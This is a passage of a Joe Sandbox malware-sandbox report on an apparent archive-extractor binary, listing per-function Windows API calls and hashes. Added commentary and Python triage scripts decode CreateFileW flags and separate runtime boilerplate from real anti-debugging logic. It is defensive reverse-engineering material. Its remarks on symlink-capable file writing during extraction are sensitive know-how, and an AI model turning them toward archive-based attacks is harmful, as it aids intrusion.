    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 000CD548
    • FindFirstFileW.KERNEL32(?,?), ref: 000CD55E
      • Part of subcall function 000CBC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 000CBC2F
      • Part of subcall function 000CBC1B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 000CBC40
      • Part of subcall function 000CBC1B: SystemTimeToFileTime.KERNEL32(?,?), ref: 000CBC4E
      • Part of subcall function 000CBC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 000CBC5C
      • Part of subcall function 000CBC1B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 000CBC77
      • Part of subcall function 000CBC1B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 000CBC9E
      • Part of subcall function 000CBC1B: _swprintf.LIBCMT ref: 000CBCC4
    • _swprintf.LIBCMT ref: 000CD5A7
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 000CD5BA
    • FindClose.KERNEL32(00000000), ref: 000CD5C1
    • _swprintf.LIBCMT ref: 000CD610
    • SetDlgItemTextW.USER32(?,00000068,?), ref: 000CD623
    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 000CD640
    • _swprintf.LIBCMT ref: 000CD673
    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 000CD686
    • _swprintf.LIBCMT ref: 000CD6D0
    • SetDlgItemTextW.USER32(?,00000069,?), ref: 000CD6E3
      • Part of subcall function 000CC083: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000CC0A9
      • Part of subcall function 000CC083: GetNumberFormatW.KERNEL32(00000400,00000000,?,000F072C,?,?), ref: 000CC0F8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberParentSpecificWindow__vswprintf_c_l
    • String ID: %s %s$REPLACEFILEDLG
    • API String ID: 2415798972-439456425
    • Opcode ID: 38c247153f1539342c9ec538c3374f973f48683c89186b0f877c5acaf942e5d2
    • Instruction ID: 0dea574a3feaf21ac848067897f01cd3a434e267eb2ffc8a16efca734db1605c
    • Opcode Fuzzy Hash: 38c247153f1539342c9ec538c3374f973f48683c89186b0f877c5acaf942e5d2
    • Instruction Fuzzy Hash: CB71C272548304BBE3359BA4DD49FFF77EDEB8A700F00482EB749D2481D675A9048762
    APIs
    • __EH_prolog.LIBCMT ref: 000B7AB4
    • _wcslen.LIBCMT ref: 000B7B1D
    • _wcslen.LIBCMT ref: 000B7B8E
      • Part of subcall function 000B8704: GetCurrentProcess.KERNEL32(00000020,?), ref: 000B8713
      • Part of subcall function 000B8704: GetLastError.KERNEL32 ref: 000B8759
      • Part of subcall function 000B8704: CloseHandle.KERNEL32(?), ref: 000B8768
      • Part of subcall function 000BB470: DeleteFileW.KERNEL32(?,00000000,?,000BA438,?,?,?,?,000B892B,?,?,?,000E37FF,000000FF), ref: 000BB481
      • Part of subcall function 000BB470: DeleteFileW.KERNEL32(?,?,?,00000800,?,000BA438,?,?,?,?,000B892B,?,?,?,000E37FF,000000FF), ref: 000BB4AF
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 000B7C43
    • CloseHandle.KERNEL32(00000000), ref: 000B7C5F
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 000B7DAB
      • Part of subcall function 000BB032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000B7ED0,?,?,?,00000000), ref: 000BB04C
      • Part of subcall function 000BB032: SetFileTime.KERNEL32(?,?,?,?), ref: 000BB100
      • Part of subcall function 000BA880: CloseHandle.KERNEL32(000000FF,?,?,000BA83D,?,?,?,?,?,000E37FF,000000FF), ref: 000BA89B
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB8FA
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
    • API String ID: 3983180755-3508440684
    • Opcode ID: c60f5fe90c048ccdc48557c6ccd8bfdb0e60a36d0312949d77b76b0ce279c90c
    • Instruction ID: 0b8893d26fe94d29e6dc3f9d4e4608a63197f311062b914b59f9a9f1b4fcc5f1
    • Opcode Fuzzy Hash: c60f5fe90c048ccdc48557c6ccd8bfdb0e60a36d0312949d77b76b0ce279c90c
    • Instruction Fuzzy Hash: 3AC1D871904249AFEB21DB64CC85FEEB7ACAF44710F00456AF549E7283DB74EA44CBA1
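    The entry above is the extractor's file-writing routine: two CreateFileW calls bracketed by DeleteFileW, SetFileAttributesW, FlushFileBuffers and SetFileTime, with the strings SeCreateSymbolicLinkPrivilege, SeRestorePrivilege, `\??\` and `UNC\` in the same function. The plugin prints the arguments as raw hex, so whether an open is reparse-point aware (the prerequisite for writing link entries from an archive) is only visible once dwDesiredAccess, dwCreationDisposition and dwFlagsAndAttributes are decoded. The following is an added example, not code from the Joe Sandbox report or from WinRAR: it decodes the two CreateFileW lines of this entry with the documented Win32 constants; `SAMPLE_REFS`, the class and function names are mine.

```python
"""Decode the CreateFileW argument lists printed in the report's "ref:" lines.

Added example: the two lines in SAMPLE_REFS are copied from the function entry
above; the constants are the documented Win32 values (winnt.h / fileapi.h).
"""
import re
from dataclasses import dataclass

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
# dwFlagsAndAttributes carries FILE_ATTRIBUTE_* in the low bits and FILE_FLAG_* above them.
FLAGS_AND_ATTRS = {
    0x00000001: "FILE_ATTRIBUTE_READONLY", 0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000004: "FILE_ATTRIBUTE_SYSTEM", 0x00000020: "FILE_ATTRIBUTE_ARCHIVE",
    0x00000080: "FILE_ATTRIBUTE_NORMAL", 0x00000100: "FILE_ATTRIBUTE_TEMPORARY",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT", 0x01000000: "FILE_FLAG_POSIX_SEMANTICS",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x20000000: "FILE_FLAG_NO_BUFFERING", 0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}

# The plugin prints whatever stack slots it recovered; CreateFileW has 7 parameters,
# anything after the 7th is just what else was on the stack at the call.
REF_RE = re.compile(r"CreateFileW\.KERNEL32\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")

SAMPLE_REFS = [  # constructed from the entry above
    "CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 000B7C43",
    "CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 000B7DAB",
]


def _bits(value, table):
    """Expand a bitmask into symbolic names; bits not in the table are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(f"0x{leftover:08X}")
    return names


@dataclass
class CreateFileCall:
    ref: str
    access: list
    share: list
    disposition: str
    flags: list

    def opens_reparse_point(self):
        # With FILE_FLAG_OPEN_REPARSE_POINT the handle refers to the link itself rather
        # than its target, which is what an extractor needs to write symlink/junction entries.
        return "FILE_FLAG_OPEN_REPARSE_POINT" in self.flags

    def describe(self):
        return (f"{self.ref}: access={'|'.join(self.access) or '0'} "
                f"share={'|'.join(self.share) or 'none'} "
                f"disposition={self.disposition} flags={'|'.join(self.flags) or '0'}")


def decode_createfile(ref_line):
    """Return a CreateFileCall for one plugin 'ref:' line, or None if it is not CreateFileW."""
    m = REF_RE.search(ref_line)
    if not m:
        return None
    args = [a.strip() for a in m.group(1).split(",")]
    if len(args) < 7:
        return None

    def slot(i):
        return None if args[i] == "?" else int(args[i], 16)  # "?" = unresolved statically

    access, share, disp, flags = slot(1), slot(2), slot(4), slot(5)
    return CreateFileCall(
        ref=m.group(2),
        access=_bits(access, GENERIC_ACCESS) if access is not None else ["?"],
        share=_bits(share, SHARE_MODE) if share is not None else ["?"],
        disposition=(DISPOSITION.get(disp, f"0x{disp:X}") if disp is not None else "?"),
        flags=_bits(flags, FLAGS_AND_ATTRS) if flags is not None else ["?"],
    )


if __name__ == "__main__":
    for line in SAMPLE_REFS:
        call = decode_createfile(line)
        note = "  <-- reparse-point aware open" if call.opens_reparse_point() else ""
        print(call.describe() + note)
```

    The first call (ref 000B7C43) is a plain GENERIC_WRITE / CREATE_NEW / FILE_ATTRIBUTE_NORMAL create; the second (ref 000B7DAB) reopens with GENERIC_READ|GENERIC_WRITE, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT, the combination that, together with the privilege names in this function, is worth a closer look when the extracted entry turns out to be a link rather than a regular file.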
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: __floor_pentium4
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
    • API String ID: 4168288129-2761157908
    • Opcode ID: 7846e4a97fa0a0b6a2522bdf853161158af828625d39482e6b23fdbe6a18ade3
    • Instruction ID: 0664b4770b30b87c7a2fd906e4cabb84f4abf12beb537fb59ccb5fec4de946e5
    • Opcode Fuzzy Hash: 7846e4a97fa0a0b6a2522bdf853161158af828625d39482e6b23fdbe6a18ade3
    • Instruction Fuzzy Hash: 9BC23771E086298FDB659E28DD407EAB7B5EB44304F1481EBD84EE7341E774AE818F50
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog_swprintf
    • String ID: CMT$h%u$hc%u
    • API String ID: 146138363-3282847064
    • Opcode ID: 42620bb06e3e0c50c4685815fd1da886dff133cf99ec89396bfd0037a692a1e2
    • Instruction ID: 24d1156a1f0dee210d988774fe8c8ba8548d21176402d9d0a1049ee491218176
    • Opcode Fuzzy Hash: 42620bb06e3e0c50c4685815fd1da886dff133cf99ec89396bfd0037a692a1e2
    • Instruction Fuzzy Hash: 2E42F4716042849FDF24DF34C895AEA3BE5AF15300F54447DFD4A8B283EB74AA89CB61
    APIs
    • __EH_prolog.LIBCMT ref: 000B2EBF
    • _strlen.LIBCMT ref: 000B348B
      • Part of subcall function 000C15F9: __EH_prolog.LIBCMT ref: 000C15FE
      • Part of subcall function 000C2EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,000BCF18,00000000,?,?), ref: 000C2EDE
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000B35DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
    • String ID: CMT
    • API String ID: 1206968400-2756464174
    • Opcode ID: 5ea6a925460892ff2256ce7c8a1a06d6b0eefde4600cc76c736194c20878cbac
    • Instruction ID: 13aca2d8c2896c978194a36b5e45156e043f0b4b8d4bf8470c0b589206b7ace3
    • Opcode Fuzzy Hash: 5ea6a925460892ff2256ce7c8a1a06d6b0eefde4600cc76c736194c20878cbac
    • Instruction Fuzzy Hash: 406237716042848FDF29DF38C8956EA7BE1AF55300F18457EFC5A9B283DB70AA48CB51
    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000D0A06
    • IsDebuggerPresent.KERNEL32 ref: 000D0AD2
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000D0AF2
    • UnhandledExceptionFilter.KERNEL32(?), ref: 000D0AFC
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: 18333312405535513bb5410dcf9ebe26b8573e5a918ddca3f5c6158c5ac45944
    • Instruction ID: 6355225568ed9a75f46774687f68e4669470f388a997c797c9708a721c325750
    • Opcode Fuzzy Hash: 18333312405535513bb5410dcf9ebe26b8573e5a918ddca3f5c6158c5ac45944
    • Instruction Fuzzy Hash: AA312475D453199BEB20DFA4D989BCDBBB8AF08304F1041EAE40CAB251EB759A848F15
    APIs
    • VirtualQuery.KERNEL32(80000000,000CF764,0000001C,000CF959,00000000,?,?,?,?,?,?,?,000CF764,00000004,00113D24,000CF9E9), ref: 000CF830
    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,000CF764,00000004,00113D24,000CF9E9), ref: 000CF84B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: InfoQuerySystemVirtual
    • String ID: D
    • API String ID: 401686933-2746444292
    • Opcode ID: ddd158d8d619ab73d1a241a53d684543953cf2514c8454855dab13c8d9a9e353
    • Instruction ID: 953865185d2d64536845869aab70df1c380e6c5cb32d2cf97dcd867d9e5f4ae9
    • Opcode Fuzzy Hash: ddd158d8d619ab73d1a241a53d684543953cf2514c8454855dab13c8d9a9e353
    • Instruction Fuzzy Hash: 7901D832600109ABDB14DF29DC05BED7BEAEFD4324F08C134AD19DB154DA38D9058680
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000D50D7
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000D50E1
    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 000D50EE
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: f0c2fb91f66720686a2e59226b63c9130c54e096fe055cd72d3e661a817344de
    • Instruction ID: 3ae21c74271b8a7f5a0d329ebc8f1af1acb742d87496bfd9d3fc7253d85c89e8
    • Opcode Fuzzy Hash: f0c2fb91f66720686a2e59226b63c9130c54e096fe055cd72d3e661a817344de
    • Instruction Fuzzy Hash: 7E31C274941319ABCB61DF68DC88BDDBBB8AF18310F5041DAE80CA7291EB349F818F54
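    Two entries on this page carry the API sequence behind the "Contains functionality to check if a debugger is running (IsDebuggerPresent)" signature: IsProcessorFeaturePresent(0x17), which is PF_FASTFAIL_AVAILABLE, then IsDebuggerPresent, then SetUnhandledExceptionFilter(0), then UnhandledExceptionFilter (ref 000D0A06 onward), and the shorter triad at 000D50D7 onward. The filter is cleared to NULL rather than installed, and the call lands in UnhandledExceptionFilter rather than in code that branches on the debugger result; that is the shape of the MSVC runtime's security-failure / fast-fail path, not of an anti-debugging check, so the signature deserves a triage note rather than a verdict. Separately, the run of delay-load entries earlier on this page are thunks that all resolve to ___delayLoadHelper2@8; five of them share the Instruction ID b31545519e… under different Opcode IDs, i.e. the same bytes at different addresses. The following is an added example, not part of Joe Sandbox or its IDA plugin: a triage script that parses entries in this report's layout, collapses duplicates by Instruction ID and tags those two boilerplate patterns. `SAMPLE` is constructed from values on this page; the tag names and the heuristics in `classify` are mine.

```python
"""Triage helper for the per-function entries emitted by the Joe Sandbox IDA plugin.

Added example. It (1) collapses entries that share an Instruction ID, which is the
same code at a different address, and (2) tags API sequences that are MSVC runtime
or delay-import boilerplate so they are not mistaken for evasion logic.
"""
import re

# Constructed excerpt in the report's own layout, trimmed to the fields that are used.
SAMPLE = """\
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
  • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
• Opcode ID: bb1e55d8f0bf64479e2a523281cd48d472687075d7f7af681b6ed836dfde035d
• Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
• Opcode ID: 1cc674762fc082c9266d05f41729ccc291d63f3c7d432cacc3b5a8e42bcaad12
• Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000D0A06
• IsDebuggerPresent.KERNEL32 ref: 000D0AD2
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000D0AF2
• UnhandledExceptionFilter.KERNEL32(?), ref: 000D0AFC
• Opcode ID: 18333312405535513bb5410dcf9ebe26b8573e5a918ddca3f5c6158c5ac45944
• Instruction ID: 6355225568ed9a75f46774687f68e4669470f388a997c797c9708a721c325750
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 000D50D7
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 000D50E1
• UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 000D50EE
• Opcode ID: f0c2fb91f66720686a2e59226b63c9130c54e096fe055cd72d3e661a817344de
• Instruction ID: 3ae21c74271b8a7f5a0d329ebc8f1af1acb742d87496bfd9d3fc7253d85c89e8
"""

ENTRY_SPLIT = re.compile(r"^APIs\s*$", re.M)
# Direct calls only: "Part of subcall function" lines belong to callees, not to this function.
API_RE = re.compile(r"^\s*•\s+(?!Part of subcall)([^\s.(]+)\.[A-Z_0-9]+(\(([^)]*)\))?", re.M)
OPCODE_RE = re.compile(r"Opcode ID:\s*([0-9a-f]{64})")
INSTR_RE = re.compile(r"Instruction ID:\s*([0-9a-f]{64})")

CRT_TRIAD = ["IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"]


def parse_entries(text):
    """Split report text into entries: {'apis': [(name, args)], 'opcode_id', 'instruction_id'}."""
    entries = []
    for chunk in ENTRY_SPLIT.split(text)[1:]:  # text before the first "APIs" is not an entry
        apis = [(m.group(1), m.group(3) or "") for m in API_RE.finditer(chunk)]
        op, ins = OPCODE_RE.search(chunk), INSTR_RE.search(chunk)
        entries.append({"apis": apis,
                        "opcode_id": op.group(1) if op else None,
                        "instruction_id": ins.group(1) if ins else None})
    return entries


def classify(entry):
    """Heuristic tags (mine, not the plugin's) for sequences that are compiler boilerplate."""
    names = [n for n, _ in entry["apis"]]
    tags = set()
    if names and set(names) == {"___delayLoadHelper2@8"}:
        tags.add("delayload-thunk")
    # CRT security-failure path: probe for a debugger, *clear* the unhandled-exception
    # filter, then hand the exception to UnhandledExceptionFilter. Anti-debug code that
    # abuses these APIs installs a filter of its own rather than resetting it to NULL.
    seq = [n for n in names if n in CRT_TRIAD]
    clears_filter = any(n == "SetUnhandledExceptionFilter" and a.split(",")[0] == "00000000"
                        for n, a in entry["apis"])
    if seq == CRT_TRIAD and clears_filter:
        tags.add("crt-security-failure")
    return tags


def collapse(entries):
    """Map Instruction ID -> list of Opcode IDs that share that exact code."""
    groups = {}
    for e in entries:
        if e["instruction_id"]:
            groups.setdefault(e["instruction_id"], []).append(e["opcode_id"])
    return groups


def triage(text):
    """One row per distinct function body: (instruction_id, number of addresses, sorted tags)."""
    by_iid = {}
    for e in parse_entries(text):
        by_iid.setdefault(e["instruction_id"], []).append(e)
    return [(iid, len(group), sorted(classify(group[0]))) for iid, group in by_iid.items()]


if __name__ == "__main__":
    for iid, count, tags in triage(SAMPLE):
        print(f"{iid[:16]}...  x{count}  {', '.join(tags) or 'needs manual review'}")
```

    Run against the whole export the script turns the seven delay-load entries into a single row and tags both IsDebuggerPresent entries as runtime boilerplate, which leaves the reviewer's time for entries such as the symlink-capable file writer above. The heuristics are deliberately narrow: an entry that calls IsDebuggerPresent and then branches, or that installs a non-NULL exception filter, gets no tag and stays in the "needs manual review" pile.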
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID:
    • String ID: .
    • API String ID: 0-248832578
    • Opcode ID: 2f1a7c1ea1ad3a26f7bfaca2983b9c9cf172c0975192c25043c37925ec95818e
    • Instruction ID: 723b0f11ba8f54ab9a3879faaf7fd79e2082fb07bd078a80cf6c2523ef70138d
    • Opcode Fuzzy Hash: 2f1a7c1ea1ad3a26f7bfaca2983b9c9cf172c0975192c25043c37925ec95818e
    • Instruction Fuzzy Hash: 4831E17190034A6EEB649E78DC84EFB7BBDDB85314F00019AE91997252E630AE84CB60
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
